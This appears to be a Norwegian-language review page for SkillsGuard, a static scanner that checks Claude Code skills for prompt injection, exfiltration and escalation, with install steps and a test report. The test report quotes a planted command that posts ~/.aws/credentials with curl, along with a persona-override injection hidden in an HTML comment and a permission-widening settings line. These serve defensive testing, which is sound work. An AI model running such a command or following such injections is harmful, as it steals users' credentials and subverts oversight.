SkillsGuard

Statisk skanner som reviderer en SKILL.md for injeksjon, eksfiltrering og eskalering

av Teycir · Teycir/SkillsGuard

Krever oppsett ★ 6.8/10

SkillsGuard — Statisk skanner som reviderer en SKILL.md for injeksjon, eksfiltrering og eskalering

Hva den gjør

Driver SkillsGuard statisk skanner — 15 regelkategorier som dekker prompt injection, eksfiltrering, command injection, persistens, privilegieeskalering, obfuskering og forsyningskjede — over en enkelt ferdighet eller en hel ferdighetsmappe, og formaterer deretter funnene til en alvorlighetsgrad-gruppert dom med en installasjons-/ikke-installasjonsanbefaling. Den dekoder base64 og andre obfuskerte blobs før matching, slik at nyttelaster skjult inne i kodede strenger rapporteres med det dekodede beviset. Utløses av forespørsler som scan this skill, is this skill safe, eller audit my skills folder.

Testrapport

Dekode-først-motoren er den virkelige tingen: plantet en ferdighet hvis setup.sh skjulte `curl -X POST -d @<(cat ~/.aws/credentials)` inne i en base64-blob, og skanneren dekodet den og rapporterte eksfiltrering av legitimasjon, settings.json tillatelsesutvidelseslinjen og persona-override-injeksjonen begravd i en HTML-kommentar — 17 funn på 16 ms, alle tre angrepene fanget. Presisjon er problemet. Rettet mot et ekte bibliotek med 278 installerte ferdigheter, utstedte den 15 480 funn og scoret hele mappen 100/100 CRITISK, og flagget 204 av 278 ferdigheter som HØY-eller-verre; de to mest fremtredende reglene matcher `rm` og `sh` uten ordgrenser, så all markdown inline-kode som inneholder 'format' eller 'publish' rapporteres som command injection. En harmløs 14-linjers notatferdighet hvis eneste backtick var `--format markdown` kom tilbake som MEDIUM med fem HØY 'command injection'-funn. Den er heller ikke på npm — SKILL.md alene gjør ingenting, og du må klone, npm install, bygge og npm link (eller koble til MCP-serveren) før ferdigheten har noe å kalle. Nyttig som en rask før-installasjonstriage på en mistenkelig ferdighet; stol ikke på dens mappe-nivå-dom.

Testet på: 2026-08-07 · Claude Code 2.x (agent harness)

Installer

git clone https://github.com/Teycir/SkillsGuard.git
mkdir -p ~/.claude/skills
cp -r SkillsGuard/skill ~/.claude/skills/skillsguard
# scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link

Kommandoer og eksempelprompter

  • /skillsguardStatisk skanner som reviderer en SKILL.md for injeksjon, eksfiltrering og eskalering

Skills utløses av vanlige forespørsler — ingen kommandoer å huske. Etter installasjonen aktiverer prompter som disse skillen (på engelsk):

  • Can you scan this skill for prompt injection before I install it?
  • Is this Claude Code skill safe to install, any red flags?
  • Audit my whole ~/.claude/skills folder for exfiltration risks